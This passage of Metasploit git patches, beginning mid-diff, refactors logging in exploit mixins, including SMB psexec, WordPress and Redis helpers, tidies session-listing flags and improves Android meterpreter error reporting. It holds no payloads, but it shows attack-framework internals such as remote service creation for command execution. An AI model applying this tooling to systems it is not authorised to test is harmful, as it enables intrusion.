to SMTP server #{rhost}:#{rport}...") + vprint_status("Connecting to SMTP server #{rhost}:#{rport}...") nsock = connect(global) if datastore['DOMAIN'] and not datastore['DOMAIN'] == '' @@ -114,7 +114,7 @@ module Exploit::Remote::SMTPDeliver else if datastore['PASSWORD'] and datastore["USERNAME"] and not datastore["USERNAME"].empty? # Let the user know their creds are going unused - print_verbose("Server didn't ask for authentication, skipping") + vprint_status("Server didn't ask for authentication, skipping") end end end @@ -170,7 +170,7 @@ module Exploit::Remote::SMTPDeliver end if not already_connected - print_verbose("Closing the connection...") + vprint_status("Closing the connection...") disconnect(nsock) end @@ -187,11 +187,11 @@ module Exploit::Remote::SMTPDeliver return false if not nsock if cmd =~ /AUTH PLAIN/ # Don't print the user's plaintext password - print_verbose("C: AUTH PLAIN ...") + vprint_status("C: AUTH PLAIN ...") else # Truncate because this will include a full email and we don't want # to dump it all. - print_verbose("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") + vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") end nsock.put(cmd) @@ -199,17 +199,11 @@ module Exploit::Remote::SMTPDeliver # Don't truncate the server output because it might be helpful for # debugging. - print_verbose("S: #{res.strip}") if res + vprint_status("S: #{res.strip}") if res return res end - def print_verbose(msg) - if datastore['VERBOSE'] - print_status(msg) - end - end - # The banner received after the initial connection to the server. This should look something like: # 220 mx.google.com ESMTP s5sm3837150wak.12 From ad026b3a7ad798e4e4db12431d05c76522b005f5 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Jan 2016 13:58:24 -0600 Subject: [PATCH 28/71] Add #peer to Tcp --- lib/msf/core/auxiliary/scanner.rb | 5 ++ lib/msf/core/exploit/http/wordpress/admin.rb | 10 ++-- lib/msf/core/exploit/http/wordpress/base.rb | 2 +- .../core/exploit/http/wordpress/helpers.rb | 4 +- lib/msf/core/exploit/http/wordpress/posts.rb | 16 +++--- lib/msf/core/exploit/http/wordpress/users.rb | 2 +- .../core/exploit/http/wordpress/version.rb | 4 +- lib/msf/core/exploit/smb/client/psexec.rb | 52 +++++++++---------- lib/msf/core/exploit/tcp.rb | 8 +++ .../ui/console/module_command_dispatcher.rb | 8 +-- lib/rex/proto/dcerpc/svcctl/packet.rb | 18 +++---- 11 files changed, 69 insertions(+), 60 deletions(-) diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index ac4991cbf0..43b4c4c905 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb @@ -42,6 +42,11 @@ def check end +def peer + # IPv4 addr can be 16 chars + 1 for : and + 5 for port + super.ljust(21) +end + # # The command handler when launched from the console # diff --git a/lib/msf/core/exploit/http/wordpress/admin.rb b/lib/msf/core/exploit/http/wordpress/admin.rb index 7fc84f856c..a17f2b6058 100644 --- a/lib/msf/core/exploit/http/wordpress/admin.rb +++ b/lib/msf/core/exploit/http/wordpress/admin.rb @@ -10,10 +10,10 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin def wordpress_upload_plugin(name, zip, cookie) nonce = wordpress_helper_get_plugin_upload_nonce(cookie) if nonce.nil? - vprint_error("#{peer} - Failed to acquire the plugin upload nonce") + vprint_error("Failed to acquire the plugin upload nonce") return false end - vprint_status("#{peer} - Acquired a plugin upload nonce: #{nonce}") + vprint_status("Acquired a plugin upload nonce: #{nonce}") referer_uri = normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload') data = Rex::MIME::Message.new @@ -32,11 +32,11 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin ) if res && res.code == 200 - vprint_status("#{peer} - Uploaded plugin #{name}") + vprint_status("Uploaded plugin #{name}") return true else - vprint_error("#{peer} - Server responded with code #{res.code}") if res - vprint_error("#{peer} - Failed to upload plugin #{name}") + vprint_error("Server responded with code #{res.code}") if res + vprint_error("Failed to upload plugin #{name}") return false end end diff --git a/lib/msf/core/exploit/http/wordpress/base.rb b/lib/msf/core/exploit/http/wordpress/base.rb index 386b6378f9..f25298c868 100644 --- a/lib/msf/core/exploit/http/wordpress/base.rb +++ b/lib/msf/core/exploit/http/wordpress/base.rb @@ -27,7 +27,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Base return res if res && res.code == 200 && res.body && wordpress_detect_regexes.any? { |r| res.body =~ r } return nil rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e - print_error("#{peer} - Error connecting to #{target_uri}: #{e}") + print_error("Error connecting to #{target_uri}: #{e}") return nil end end diff --git a/lib/msf/core/exploit/http/wordpress/helpers.rb b/lib/msf/core/exploit/http/wordpress/helpers.rb index a9b70dae79..206b0364c7 100644 --- a/lib/msf/core/exploit/http/wordpress/helpers.rb +++ b/lib/msf/core/exploit/http/wordpress/helpers.rb @@ -52,7 +52,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers if res && res.redirect? && res.redirection return wordpress_helper_parse_location_header(res) else - message = "#{peer} - Post comment failed." + message = "Post comment failed." message << " Status Code: #{res.code}" if res print_error(message) return nil @@ -67,7 +67,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @return [Integer,nil] The post id, nil when nothing found def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil) range.each { |id| - vprint_status("#{peer} - Checking POST ID #{id}...") if (id % 100) == 0 + vprint_status("Checking POST ID #{id}...") if (id % 100) == 0 body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie) return id if body } diff --git a/lib/msf/core/exploit/http/wordpress/posts.rb b/lib/msf/core/exploit/http/wordpress/posts.rb index 57735bdf4a..ec0f52cff6 100644 --- a/lib/msf/core/exploit/http/wordpress/posts.rb +++ b/lib/msf/core/exploit/http/wordpress/posts.rb @@ -99,11 +99,11 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts # @param max_redirects [Integer] maximum redirects to follow # @return [Array,nil] String Array with valid blog posts, nil on error def wordpress_get_all_blog_posts_via_feed(max_redirects = 10) - vprint_status("#{peer} - Enumerating Blog posts...") + vprint_status("Enumerating Blog posts...") blog_posts = [] begin - vprint_status("#{peer} - Locating wordpress feed...") + vprint_status("Locating wordpress feed...") res = send_request_cgi({ 'uri' => wordpress_url_rss, 'method' => 'GET' @@ -116,26 +116,26 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts path = wordpress_helper_parse_location_header(res) return nil unless path - vprint_status("#{peer} - Web server returned a #{res.code}...following to #{path}") + vprint_status("Web server returned a #{res.code}...following to #{path}") res = send_request_cgi({ 'uri' => path, 'method' => 'GET' }) if res.code == 200 - vprint_status("#{peer} - Feed located at #{path}") + vprint_status("Feed located at #{path}") else - vprint_status("#{peer} - Returned a #{res.code}...") + vprint_status("Returned a #{res.code}...") end count = count - 1 end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return nil end if res.nil? or res.code != 200 - vprint_status("#{peer} - Did not recieve HTTP response for RSS feed") + vprint_status("Did not recieve HTTP response for RSS feed") return blog_posts end @@ -143,7 +143,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts links = res.body.scan(/([^<]+)<\/link>/i) if links.nil? or links.empty? - vprint_status("#{peer} - Feed did not have any links present") + vprint_status("Feed did not have any links present") return blog_posts end diff --git a/lib/msf/core/exploit/http/wordpress/users.rb b/lib/msf/core/exploit/http/wordpress/users.rb index 4ddac519ad..98fd963bc8 100644 --- a/lib/msf/core/exploit/http/wordpress/users.rb +++ b/lib/msf/core/exploit/http/wordpress/users.rb @@ -48,7 +48,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Users end if res.nil? - print_error("#{peer} - Error getting response.") + print_error("Error getting response.") return nil elsif res.code == 200 and ( diff --git a/lib/msf/core/exploit/http/wordpress/version.rb b/lib/msf/core/exploit/http/wordpress/version.rb index 80c693e56d..3561534b49 100644 --- a/lib/msf/core/exploit/http/wordpress/version.rb +++ b/lib/msf/core/exploit/http/wordpress/version.rb @@ -134,7 +134,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version res = nil readmes.each do |readme_name| readme_url = normalize_uri(target_uri.path, wp_content_dir, folder, name, readme_name) - vprint_status("#{peer} - Checking #{readme_url}") + vprint_status("Checking #{readme_url}") res = send_request_cgi( 'uri' => readme_url, 'method' => 'GET' @@ -180,7 +180,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version # Could not identify version number return Msf::Exploit::CheckCode::Detected if version.nil? - vprint_status("#{peer} - Found version #{version} of the #{item_type}") + vprint_status("Found version #{version} of the #{item_type}") if fixed_version.nil? if vuln_introduced_version.nil? diff --git a/lib/msf/core/exploit/smb/client/psexec.rb b/lib/msf/core/exploit/smb/client/psexec.rb index bd60e6c675..cb1acf684b 100644 --- a/lib/msf/core/exploit/smb/client/psexec.rb +++ b/lib/msf/core/exploit/smb/client/psexec.rb @@ -74,7 +74,7 @@ module Exploit::Remote::SMB::Client::Psexec simple.disconnect("\\\\#{host}\\#{smbshare}") return contents rescue Rex::Proto::SMB::Exceptions::ErrorCode => e - print_error("#{peer} - Unable to read file #{file}. #{e.class}: #{e}.") + print_error("Unable to read file #{file}. #{e.class}: #{e}.") return nil end end @@ -94,16 +94,16 @@ module Exploit::Remote::SMB::Client::Psexec def psexec(command, disconnect=true) simple.connect("\\\\#{datastore['RHOST']}\\IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") + vprint_status("Binding to #{handle} ...") dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") - vprint_status("#{peer} - Obtaining a service manager handle...") + vprint_status("Bound to #{handle} ...") + vprint_status("Obtaining a service manager handle...") svc_client = Rex::Proto::DCERPC::SVCCTL::Client.new(dcerpc) scm_handle, scm_status = svc_client.openscmanagerw(datastore['RHOST']) if scm_status == ERROR_ACCESS_DENIED - print_error("#{peer} - ERROR_ACCESS_DENIED opening the Service Manager") + print_error("ERROR_ACCESS_DENIED opening the Service Manager") end return false unless scm_handle @@ -114,68 +114,68 @@ module Exploit::Remote::SMB::Client::Psexec opts = {} end - vprint_status("#{peer} - Creating the service...") + vprint_status("Creating the service...") svc_handle, svc_status = svc_client.createservicew(scm_handle, service_name, display_name, command, opts) case svc_status when ERROR_SUCCESS - vprint_good("#{peer} - Successfully created the service") + vprint_good("Successfully created the service") when ERROR_SERVICE_EXISTS service_exists = true - print_warning("#{peer} - Service already exists, opening a handle...") + print_warning("Service already exists, opening a handle...") svc_handle = svc_client.openservicew(scm_handle, service_name) when ERROR_ACCESS_DENIED - print_error("#{peer} - Unable to create service, ACCESS_DENIED, did AV gobble your binary?") + print_error("Unable to create service, ACCESS_DENIED, did AV gobble your binary?") return false else - print_error("#{peer} - Failed to create service, ERROR_CODE: #{svc_status}") + print_error("Failed to create service, ERROR_CODE: #{svc_status}") return false end if svc_handle.nil? - print_error("#{peer} - No service handle retrieved") + print_error("No service handle retrieved") return false else if service_description - vprint_status("#{peer} - Changing service description...") + vprint_status("Changing service description...") svc_client.changeservicedescription(svc_handle, service_description) end - vprint_status("#{peer} - Starting the service...") + vprint_status("Starting the service...") begin svc_status = svc_client.startservice(svc_handle) case svc_status when ERROR_SUCCESS - print_good("#{peer} - Service started successfully...") + print_good("Service started successfully...") when ERROR_FILE_NOT_FOUND - print_error("#{peer} - Service failed to start - FILE_NOT_FOUND") + print_error("Service failed to start - FILE_NOT_FOUND") when ERROR_ACCESS_DENIED - print_error("#{peer} - Service failed to start - ACCESS_DENIED") + print_error("Service failed to start - ACCESS_DENIED") when ERROR_SERVICE_REQUEST_TIMEOUT - print_good("#{peer} - Service start timed out, OK if running a command or non-service executable...") + print_good("Service start timed out, OK if running a command or non-service executable...") else - print_error("#{peer} - Service failed to start, ERROR_CODE: #{svc_status}") + print_error("Service failed to start, ERROR_CODE: #{svc_status}") end ensure begin # If service already exists don't delete it! # Maybe we could have a force cleanup option..? if service_exists - print_warning("#{peer} - Not removing service as it already existed...") + print_warning("Not removing service as it already existed...") elsif datastore['SERVICE_PERSIST'] - print_warning("#{peer} - Not removing service for persistance...") + print_warning("Not removing service for persistance...") else - vprint_status("#{peer} - Removing the service...") + vprint_status("Removing the service...") svc_status = svc_client.deleteservice(svc_handle) if svc_status == ERROR_SUCCESS - vprint_good("#{peer} - Successfully removed the sevice") + vprint_good("Successfully removed the sevice") else - print_error("#{peer} - Unable to remove the service, ERROR_CODE: #{svc_status}") + print_error("Unable to remove the service, ERROR_CODE: #{svc_status}") end end ensure - vprint_status("#{peer} - Closing service handle...") + vprint_status("Closing service handle...") svc_client.closehandle(svc_handle) end end @@ -189,10 +189,6 @@ module Exploit::Remote::SMB::Client::Psexec true end - def peer - "#{rhost}:#{rport}" - end - end end diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 7c342a3a03..06a588005d 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -195,6 +195,14 @@ module Exploit::Remote::Tcp disconnect end + def print_prefix + if rhost + super + peer + " - " + else + super + end + end + ## # # Wrappers for getters diff --git a/lib/msf/ui/console/module_command_dispatcher.rb b/lib/msf/ui/console/module_command_dispatcher.rb index 07bcef3693..a78b6f8107 100644 --- a/lib/msf/ui/console/module_command_dispatcher.rb +++ b/lib/msf/ui/console/module_command_dispatcher.rb @@ -193,13 +193,13 @@ module ModuleCommandDispatcher 'LocalOutput' => driver.output) if (code and code.kind_of?(Array) and code.length > 1) if (code == Msf::Exploit::CheckCode::Vulnerable) - print_good("#{peer} - #{code[1]}") + print_good("#{code[1]}") report_vuln(instance) else - print_status("#{peer} - #{code[1]}") + print_status("#{code[1]}") end else - msg = "#{peer} - Check failed: The state could not be determined." + msg = "Check failed: The state could not be determined." print_error(msg) elog("#{msg}\n#{caller.join("\n")}") end @@ -213,7 +213,7 @@ module ModuleCommandDispatcher print_error("Check failed: #{e.message}") elog("#{e.message}\n#{e.backtrace.join("\n")}") rescue ::Exception => e - print_error("#{peer} - Check failed: #{e.class} #{e}") + print_error("Check failed: #{e.class} #{e}") elog("#{e.message}\n#{e.backtrace.join("\n")}") end end diff --git a/lib/rex/proto/dcerpc/svcctl/packet.rb b/lib/rex/proto/dcerpc/svcctl/packet.rb index 6d27f6b849..7e65cb86cd 100644 --- a/lib/rex/proto/dcerpc/svcctl/packet.rb +++ b/lib/rex/proto/dcerpc/svcctl/packet.rb @@ -53,7 +53,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error getting scm handle: #{e}") + print_error("Error getting scm handle: #{e}") end [scm_handle, scm_status] @@ -124,7 +124,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error creating service: #{e}") + print_error("Error creating service: #{e}") end return svc_handle, svc_status @@ -149,7 +149,7 @@ class Client response = dcerpc_client.call(CHANGE_SERVICE_CONFIG2_W, stubdata) # ChangeServiceConfig2 svc_status = error_code(response) rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error changing service description : #{e}") + print_error("Error changing service description : #{e}") end svc_status @@ -169,7 +169,7 @@ class Client svc_status = error_code(response[20,4]) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error closing service handle: #{e}") + print_error("Error closing service handle: #{e}") end svc_status @@ -195,7 +195,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error opening service handle: #{e}") + print_error("Error opening service handle: #{e}") end svc_handle @@ -219,7 +219,7 @@ class Client svc_status = error_code(response) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error starting service: #{e}") + print_error("Error starting service: #{e}") end svc_status @@ -249,7 +249,7 @@ class Client svc_status = error_code(response[28,4]) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error controlling service: #{e}") + print_error("Error controlling service: #{e}") end svc_status @@ -268,7 +268,7 @@ class Client svc_status = error_code(response) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error deleting service: #{e}") + print_error("Error deleting service: #{e}") end svc_status @@ -292,7 +292,7 @@ class Client ret = 2 end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error deleting service: #{e}") + print_error("Error deleting service: #{e}") end ret From c2f8e954927eef921612c2ae2f486cf2021c3cfd Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Jan 2016 14:18:19 -0600 Subject: [PATCH 29/71] Missed one --- lib/msf/core/auxiliary/redis.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/auxiliary/redis.rb b/lib/msf/core/auxiliary/redis.rb index 20714c8eb3..3b0d3c6e8e 100644 --- a/lib/msf/core/auxiliary/redis.rb +++ b/lib/msf/core/auxiliary/redis.rb @@ -48,29 +48,29 @@ module Msf def redis_command(*commands) command_string = printable_redis_response(commands.join(' ')) unless (command_response = send_redis_command(*commands)) - vprint_error("#{peer} -- no response to '#{command_string}'") + vprint_error("No response to '#{command_string}'") return end if /(?ERR operation not permitted|NOAUTH Authentication required)/i =~ command_response fail_with(::Msf::Module::Failure::BadConfig, "#{peer} requires authentication but Password unset") unless datastore['Password'] - vprint_status("#{peer} -- requires authentication (#{printable_redis_response(auth_response, false)})") + vprint_status("Requires authentication (#{printable_redis_response(auth_response, false)})") if (auth_response = send_redis_command('AUTH', datastore['Password'])) unless auth_response =~ /\+OK/ - vprint_error("#{peer} -- authentication failure: #{printable_redis_response(auth_response)}") + vprint_error("Authentication failure: #{printable_redis_response(auth_response)}") return end - vprint_status("#{peer} -- authenticated") + vprint_status("Authenticated") unless (command_response = send_redis_command(*commands)) - vprint_error("#{peer} -- no response to '#{command_string}'") + vprint_error("No response to '#{command_string}'") return end else - vprint_status("#{peer} -- authentication failed; no response") + vprint_status("Authentication failed; no response") return end end - vprint_status("#{peer} -- redis command '#{command_string}' got '#{printable_redis_response(command_response)}'") + vprint_status("Redis command '#{command_string}' got '#{printable_redis_response(command_response)}'") command_response end From 7b4f3f8148966ed6f1d61b68b5c9ae2120c7ebce Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 29 Jan 2016 11:52:21 +1000 Subject: [PATCH 30/71] Remove -vv, restore -v and add -ci --- lib/msf/base/serializer/readable_text.rb | 29 ++++++++++--------- lib/msf/ui/console/command_dispatcher/core.rb | 12 ++++---- 2 files changed, 21 insertions(+), 20 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 5b20981a9c..b93cd55bc0 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -524,20 +524,18 @@ class ReadableText def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false - extended = opts[:extended] || false + show_checkin = opts[:show_checkin] || false indent = opts[:indent] || DefaultIndent col = opts[:col] || DefaultColumnWrap return dump_sessions_verbose(framework, opts) if verbose - columns = - [ - 'Id', - 'Type', - 'Information', - 'Connection' - ] - columns << 'Checkin?' if extended + columns = [] + columns << 'Id' + columns << 'Type' + columns << 'Checkin?' if show_checkin + columns << 'Information' + columns << 'Connection' tbl = Rex::Ui::Text::Table.new( 'Indent' => indent, @@ -553,12 +551,12 @@ class ReadableText sinfo = sinfo[0,77] + "..." end - row = [ session.sid.to_s, session.type.to_s, sinfo, session.tunnel_to_s + " (#{session.session_host})" ] - if session.respond_to?(:platform) - row[1] << (" " + session.platform) - end + row = [] + row << session.sid.to_s + row << session.type.to_s + row[-1] << (" " + session.platform) if session.respond_to?(:platform) - if extended + if show_checkin if session.respond_to?(:last_checkin) && session.last_checkin row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago" else @@ -566,6 +564,9 @@ class ReadableText end end + row << sinfo + row << session.tunnel_to_s + " (#{session.session_host})" + tbl << row } diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index e129744ff3..d5080f9f40 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -35,11 +35,11 @@ class Core # Session command options @@sessions_opts = Rex::Parser::Arguments.new( "-c" => [ true, "Run a command on the session given with -i, or all" ], + "-ci" => [ false, "Show the last checkin time in the session table" ], "-h" => [ false, "Help banner" ], "-i" => [ true, "Interact with the supplied session ID " ], "-l" => [ false, "List all active sessions" ], - "-v" => [ false, "List extended fields" ], - "-vv" => [ false, "Render in verbose mode" ], + "-v" => [ false, "List sessions in verbose mode" ], "-q" => [ false, "Quiet mode" ], "-k" => [ true, "Terminate sessions by session ID and/or range" ], "-K" => [ false, "Terminate all sessions" ], @@ -1760,7 +1760,7 @@ class Core begin method = nil quiet = false - extended = false + show_checkin = false verbose = false sid = nil cmds = [] @@ -1781,9 +1781,9 @@ class Core when "-c" method = 'cmd' cmds << val if val + when "-ci" + show_checkin = true when "-v" - extended = true - when "-vv" verbose = true # Do something with the supplied session identifier instead of # all sessions. @@ -2045,7 +2045,7 @@ class Core end when 'list',nil print_line - print(Serializer::ReadableText.dump_sessions(framework, :extended => extended, :verbose => verbose)) + print(Serializer::ReadableText.dump_sessions(framework, :show_checkin => show_checkin, :verbose => verbose)) print_line end From 4d6791d4323ab3593e725b77f857b6c72f9eed40 Mon Sep 17 00:00:00 2001 From: Tim Date: Sun, 31 Jan 2016 15:13:21 +0000 Subject: [PATCH 31/71] fix returning of error --- lib/rex/post/meterpreter/extensions/android/android.rb | 6 +++++- lib/rex/post/meterpreter/extensions/android/tlv.rb | 1 + .../meterpreter/ui/console/command_dispatcher/android.rb | 7 ++++++- 3 files changed, 12 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 32cc0f9af7..800204d726 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -246,7 +246,11 @@ class Android < Extension request = Packet.create_request('activity_start') request.add_tlv(TLV_TYPE_URI_STRING, uri) response = client.send_request(request) - response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value + if response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value + return nil + else + return response.get_tlv(TLV_TYPE_ACTIVITY_START_ERROR).value + end end def send_sms(dest, body, dr) diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 54cfa1488b..babbec853a 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -78,6 +78,7 @@ TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) +TLV_TYPE_ACTIVITY_START_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9103) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index d72044d9ec..4c6e39e4f4 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -538,7 +538,12 @@ class Console::CommandDispatcher::Android end uri = args[0] - client.android.activity_start(uri) + result = client.android.activity_start(uri) + if result.nil? + print_status("Intent started") + else + print_error("Error: #{result}") + end end # From 12256a642342c31d5a7d1a25fbe499ec708700bd Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 1 Feb 2016 15:12:03 -0600 Subject: [PATCH 32/71] Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient --- .../freebsd/misc/citrix_netscaler_soap_bof.rb | 2 +- .../linux/antivirus/escan_password_exec.rb | 6 +-- .../http/advantech_switch_bash_env_exec.rb | 10 ++-- .../linux/http/airties_login_cgi_bof.rb | 4 +- .../linux/http/alienvault_sqli_exec.rb | 40 +++++++-------- .../exploits/linux/http/astium_sqli_upload.rb | 20 ++++---- .../exploits/linux/http/belkin_login_bof.rb | 4 +- .../exploits/linux/http/centreon_sqli_exec.rb | 2 +- .../http/dlink_authentication_cgi_bof.rb | 4 +- .../linux/http/dlink_dcs931l_upload.rb | 18 +++---- .../linux/http/dlink_dir605l_captcha_bof.rb | 2 +- .../http/dlink_dspw110_cookie_noauth_exec.rb | 6 +-- .../linux/http/dlink_dspw215_info_cgi_bof.rb | 4 +- .../linux/http/dlink_hedwig_cgi_bof.rb | 4 +- modules/exploits/linux/http/dlink_hnap_bof.rb | 4 +- .../http/dlink_hnap_header_exec_noauth.rb | 4 +- .../linux/http/dlink_upnp_exec_noauth.rb | 4 +- .../exploits/linux/http/dolibarr_cmd_exec.rb | 12 ++--- modules/exploits/linux/http/esva_exec.rb | 8 +-- .../exploits/linux/http/fritzbox_echo_exec.rb | 4 +- .../linux/http/groundwork_monarch_cmd_exec.rb | 6 +-- modules/exploits/linux/http/kloxo_sqli.rb | 16 +++--- .../linux/http/linksys_themoon_exec.rb | 4 +- .../linux/http/multi_ncc_ping_exec.rb | 10 ++-- .../linux/http/mutiny_frontend_upload.rb | 10 ++-- .../linux/http/netgear_readynas_exec.rb | 2 +- .../exploits/linux/http/nginx_chunked_size.rb | 14 +++--- .../linux/http/openfiler_networkcard_exec.rb | 8 +-- .../exploits/linux/http/pandora_fms_exec.rb | 8 +-- .../exploits/linux/http/pandora_fms_sqli.rb | 48 +++++++++--------- .../http/realtek_miniigd_upnp_exec_noauth.rb | 4 +- .../linux/http/seagate_nas_php_exec_noauth.rb | 34 ++++++------- .../linux/http/smt_ipmi_close_window_bof.rb | 2 +- .../linux/http/symantec_web_gateway_exec.rb | 4 +- .../http/symantec_web_gateway_file_upload.rb | 8 +-- .../linux/http/symantec_web_gateway_lfi.rb | 6 +-- .../synology_dsm_sliceupload_exec_noauth.rb | 12 ++--- .../linux/http/vap2500_tools_command_exec.rb | 8 +-- modules/exploits/linux/http/wanem_exec.rb | 12 ++--- .../linux/http/webcalendar_settings_exec.rb | 4 +- .../exploits/linux/http/webid_converter.rb | 14 +++--- modules/exploits/linux/http/zabbix_sqli.rb | 18 +++---- .../linux/http/zen_load_balancer_exec.rb | 6 +-- .../http/zenoss_showdaemonxmlconfig_exec.rb | 12 ++--- .../exploits/linux/misc/zabbix_server_exec.rb | 16 +++--- .../linux/smtp/exim_gethostbyname_bof.rb | 2 +- .../multi/elasticsearch/script_mvel_rce.rb | 18 +++---- .../elasticsearch/search_groovy_script.rb | 20 ++++---- .../http/ajaxplorer_checkinstall_exec.rb | 6 +-- .../multi/http/apprain_upload_exec.rb | 8 +-- .../multi/http/auxilium_upload_exec.rb | 8 +-- .../exploits/multi/http/bolt_file_upload.rb | 18 +++---- .../multi/http/caidao_php_backdoor_exec.rb | 2 +- .../exploits/multi/http/cisco_dcnm_upload.rb | 4 +- modules/exploits/multi/http/coldfusion_rds.rb | 24 ++++----- .../exploits/multi/http/cups_bash_env_exec.rb | 30 +++++------ .../multi/http/cuteflow_upload_exec.rb | 6 +-- .../multi/http/dexter_casinoloader_exec.rb | 18 +++---- .../exploits/multi/http/drupal_drupageddon.rb | 26 +++++----- .../multi/http/eventlog_file_upload.rb | 14 +++--- .../multi/http/extplorer_upload_exec.rb | 26 +++++----- .../multi/http/glossword_upload_exec.rb | 22 ++++---- .../multi/http/hp_sitescope_issuesiebelcmd.rb | 4 +- .../http/hp_sitescope_uploadfileshandler.rb | 28 +++++------ .../exploits/multi/http/hp_sys_mgmt_exec.rb | 6 +-- .../multi/http/hyperic_hq_script_console.rb | 32 ++++++------ .../multi/http/kordil_edms_upload_exec.rb | 8 +-- .../multi/http/log1cms_ajax_create_folder.rb | 4 +- .../multi/http/manage_engine_dc_pmp_sqli.rb | 26 +++++----- .../multi/http/manageengine_auth_upload.rb | 12 ++--- .../multi/http/manageengine_sd_uploader.rb | 4 +- .../multi/http/mma_backdoor_upload.rb | 4 +- .../multi/http/mobilecartly_upload_exec.rb | 6 +-- .../multi/http/movabletype_upgrade_exec.rb | 4 +- .../multi/http/mutiny_subnetmask_exec.rb | 36 ++++++------- .../multi/http/nibbleblog_file_upload.rb | 16 +++--- .../http/opmanager_socialit_file_upload.rb | 12 ++--- .../exploits/multi/http/oracle_reports_rce.rb | 50 +++++++++---------- .../multi/http/pandora_upload_exec.rb | 8 +-- .../multi/http/php_volunteer_upload_exec.rb | 22 ++++---- .../exploits/multi/http/phpfilemanager_rce.rb | 4 +- .../multi/http/phpwiki_ploticus_exec.rb | 2 +- .../multi/http/polarcms_upload_exec.rb | 4 +- .../exploits/multi/http/processmaker_exec.rb | 20 ++++---- .../exploits/multi/http/qdpm_upload_exec.rb | 24 ++++----- .../rocket_servergraph_file_requestor_rce.rb | 22 ++++---- .../exploits/multi/http/sflog_upload_exec.rb | 12 ++--- .../solarwinds_store_manager_auth_filter.rb | 18 +++---- .../multi/http/sonicwall_gms_upload.rb | 10 ++-- .../http/struts_code_exec_classloader.rb | 16 +++--- .../multi/http/struts_code_exec_parameters.rb | 4 +- .../multi/http/sysaid_auth_file_upload.rb | 12 